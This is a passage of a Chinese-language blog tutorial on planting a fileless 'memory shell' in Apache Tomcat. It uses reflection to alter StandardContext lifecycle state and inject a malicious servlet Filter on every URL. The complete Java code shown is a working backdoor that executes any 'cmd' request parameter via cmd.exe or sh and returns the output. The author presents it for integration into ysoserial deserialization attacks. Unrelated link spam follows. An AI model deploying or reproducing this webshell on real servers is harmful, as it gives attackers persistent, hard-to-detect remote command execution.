0x03 內(nèi)存馬構(gòu)造#前文的基于Tomcat實現(xiàn)內(nèi)存馬中只是借助Servlet直接去進行動態(tài)添加Filter實現(xiàn)內(nèi)存馬 。而實際當中還是需要借助反序列化點來直接打入內(nèi)存馬 。
下面再來構(gòu)造一個完整的 。
獲取到ApplicationContext調(diào)用addFilter方法直接將惡意Filter添加進去發(fā)現(xiàn)并不行 。
ApplicationContext.addFilter(filterName,new ShellIntInject());斷點處進行了判斷，條件為true，會直接拋出異常 。而這時候可以借助反射去進行修改 。
Field state = Class.forName("org.apache.catalina.util.LifecycleBase").getDeclaredField("state");state.setAccessible(true);state.set(standardContext,org.apache.catalina.LifecycleState.STARTING_PREP);修改完成后，再來看到addFilter中，this.context.findFilterDef也就是尋找StandardContext中的filterDef，所以我們需要添加到filterConfigs、filterDefs、filterMaps 。
在添加filter前，通過反射設(shè)置成LifecycleState.STARTING_PREP，添加完成后，再把其恢復成LifecycleState.STARTE，需要恢復，否則可能導致服務不可用 。
//添加攔截路徑，實現(xiàn)是將存儲寫入到filterMap中registration.addMappingForUrlPatterns(java.util.EnumSet.of(javax.servlet.DispatcherType.REQUEST), false,new String[]{"/*"});后面再來看到StandardContext 中filterStart方法會遍歷所有filterDefs實例化ApplicationFilterConfig添加到filterConfigs中
this.filterConfigs.clear();Iterator i$ = this.filterDefs.entrySet().iterator();while(i$.hasNext()) {Entry<String, FilterDef> entry = (Entry)i$.next();String name = (String)entry.getKey();if (this.getLogger().isDebugEnabled()) {this.getLogger().debug(" Starting filter '" + name + "'");}try {ApplicationFilterConfig filterConfig = new ApplicationFilterConfig(this, (FilterDef)entry.getValue());this.filterConfigs.put(name, filterConfig);} catch (Throwable var8) {Throwable t = ExceptionUtils.unwrapInvocationTargetException(var8);ExceptionUtils.handleThrowable(t);this.getLogger().error(sm.getString("standardContext.filterStart", new Object[]{name}), t);ok = false;}}return ok;}}前面我們的調(diào)用addfilter方法的時候已經(jīng)將 對應的filterDef給添加進去，我們只需要調(diào)用該方法即可實現(xiàn)filterConfig的添加 。
//調(diào)用filterStart方法將filterconfig進行添加Method filterStart = Class.forName("org.apache.catalina.core.StandardContext").getMethod("filterStart");filterStart.setAccessible(true);filterStart.invoke(standardContext,null);最后，需要將filter位置進行調(diào)整 。
在調(diào)試中途，部分代碼拋出異常并沒有直接執(zhí)行state.set(standardContext,org.apache.catalina.LifecycleState.STARTED);會導致tomcat直接503 。無法進行正常訪問，需重啟 。
完整代碼#package com;import org.apache.catalina.core.ApplicationContext;import org.apache.catalina.core.StandardContext;import org.apache.tomcat.util.descriptor.web.FilterMap;import javax.servlet.*;import javax.servlet.annotation.WebServlet;import javax.servlet.http.HttpServlet;import javax.servlet.http.HttpServletRequest;import javax.servlet.http.HttpServletResponse;import java.io.BufferedInputStream;import java.io.IOException;import java.io.InputStream;import java.lang.reflect.Field;import java.lang.reflect.Method;import java.lang.reflect.Modifier;@WebServlet("/testServlet")public class testServlet extends HttpServlet {private final String cmdParamName = "cmd";private final static String filterUrlPattern = "/*";private final static String filterName = "cmdFilter";protected void doPost(HttpServletRequest request, HttpServletResponse response) {try {Field wrap_same_object = Class.forName("org.apache.catalina.core.ApplicationDispatcher").getDeclaredField("WRAP_SAME_OBJECT");Field lastServicedRequest = Class.forName("org.apache.catalina.core.ApplicationFilterChain").getDeclaredField("lastServicedRequest");Field lastServicedResponse = Class.forName("org.apache.catalina.core.ApplicationFilterChain").getDeclaredField("lastServicedResponse");lastServicedRequest.setAccessible(true);lastServicedResponse.setAccessible(true);wrap_same_object.setAccessible(true);//修改finalField modifiersField = Field.class.getDeclaredField("modifiers");modifiersField.setAccessible(true);modifiersField.setInt(wrap_same_object, wrap_same_object.getModifiers() & ~Modifier.FINAL);modifiersField.setInt(lastServicedRequest, lastServicedRequest.getModifiers() & ~Modifier.FINAL);modifiersField.setInt(lastServicedResponse, lastServicedResponse.getModifiers() & ~Modifier.FINAL);boolean wrap_same_object1 = wrap_same_object.getBoolean(null);ThreadLocal<ServletRequest> requestThreadLocal = (ThreadLocal<ServletRequest>)lastServicedRequest.get(null);ThreadLocal<ServletResponse> responseThreadLocal = (ThreadLocal<ServletResponse>)lastServicedResponse.get(null);wrap_same_object.setBoolean(null,true);lastServicedRequest.set(null,new ThreadLocal<>());lastServicedResponse.set(null,new ThreadLocal<>());ServletResponse servletResponse = responseThreadLocal.get();ServletRequest servletRequest = requestThreadLocal.get();ServletContext servletContext = servletRequest.getServletContext();//這里實際獲取到的是ApplicationContextFacadeif (servletContext!=null) {//編寫惡意Filterclass ShellIntInject implements javax.servlet.Filter{@Overridepublic void init(FilterConfig filterConfig) throws ServletException {}@Overridepublic void doFilter(ServletRequest servletRequest, ServletResponse servletResponse, FilterChain filterChain) throws IOException, ServletException {System.out.println("s");String cmd = servletRequest.getParameter(cmdParamName);if(cmd!=null) {String[] cmds = null;if (System.getProperty("os.name").toLowerCase().contains("win")) {cmds = new String[]{"cmd.exe", "/c", cmd};} else {cmds = new String[]{"sh", "-c", cmd};}java.io.InputStream in = Runtime.getRuntime().exec(cmds).getInputStream();java.util.Scanner s = new java.util.Scanner(in).useDelimiter("\a");String output = s.hasNext() ? s.next() : "";java.io.Writer writer = servletResponse.getWriter();writer.write(output);writer.flush();writer.close();}filterChain.doFilter(request, response);}@Overridepublic void destroy() {}}//獲取ApplicationContextField context = servletContext.getClass().getDeclaredField("context");context.setAccessible(true);ApplicationContext ApplicationContext = (ApplicationContext)context.get(servletContext);//獲取standardContextField context1 = ApplicationContext.getClass().getDeclaredField("context");context1.setAccessible(true);StandardContext standardContext = (StandardContext) context1.get(ApplicationContext);//獲取LifecycleBase的state修改為org.apache.catalina.LifecycleState.STARTING_PREPField state = Class.forName("org.apache.catalina.util.LifecycleBase").getDeclaredField("state");state.setAccessible(true);state.set(standardContext,org.apache.catalina.LifecycleState.STARTING_PREP);//注冊filterNameFilterRegistration.Dynamic registration = ApplicationContext.addFilter(filterName, new ShellIntInject());//添加攔截路徑，實現(xiàn)是將存儲寫入到filterMap中registration.addMappingForUrlPatterns(java.util.EnumSet.of(javax.servlet.DispatcherType.REQUEST), false,new String[]{"/*"});//調(diào)用filterStart方法將filterconfig進行添加Method filterStart = Class.forName("org.apache.catalina.core.StandardContext").getMethod("filterStart");filterStart.setAccessible(true);filterStart.invoke(standardContext,null);//移動filter為位置到前面FilterMap[] filterMaps = standardContext.findFilterMaps();for (int i = 0; i < filterMaps.length; i++) {if (filterMaps[i].getFilterName().equalsIgnoreCase(filterName)) {org.apache.tomcat.util.descriptor.web.FilterMap filterMap = filterMaps[i];filterMaps[i] = filterMaps[0];filterMaps[0] = filterMap;break;}}servletResponse.getWriter().write("Success");state.set(standardContext,org.apache.catalina.LifecycleState.STARTED);}} catch (Exception e) {e.printStackTrace();}}protected void doGet(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {this.doPost(request, response);}}但這并未完，雖然我們借助了代碼執(zhí)行獲取到Request和Response后構(gòu)造內(nèi)存馬 。但是仍需要修改代碼，將代碼集成到y(tǒng)so中后，以供反序列化攻擊使用 。

以上關(guān)于本文的內(nèi)容，僅作參考！溫馨提示：如遇健康、疾病相關(guān)的問題，請您及時就醫(yī)或請專業(yè)人士給予相關(guān)指導!

• linux系統(tǒng)安裝步驟 yum安裝命令
• 電腦怎么創(chuàng)建圖片密碼？ 圖片密碼怎么設(shè)置
• 360發(fā)現(xiàn)全球汽車操作系統(tǒng)多個高危漏洞：獲寶馬和系統(tǒng)商雙重致謝
• 安卓手機裝win10系統(tǒng)操作方法 win10系統(tǒng)版本哪個好
• 自動噴水滅火系統(tǒng)由哪些部分組成
• 電腦開不開機怎么重裝系統(tǒng)教程 win7無法關(guān)機怎么辦
• word表格自動換頁的技巧 word不分頁怎么設(shè)置
• 2021國內(nèi)最好用免費建站系統(tǒng) 免費個人網(wǎng)站空間申請
• windows7系統(tǒng)黑屏解決方法 win7激活工具哪個好用
• h5平臺搭建步驟 h5建站系統(tǒng)源碼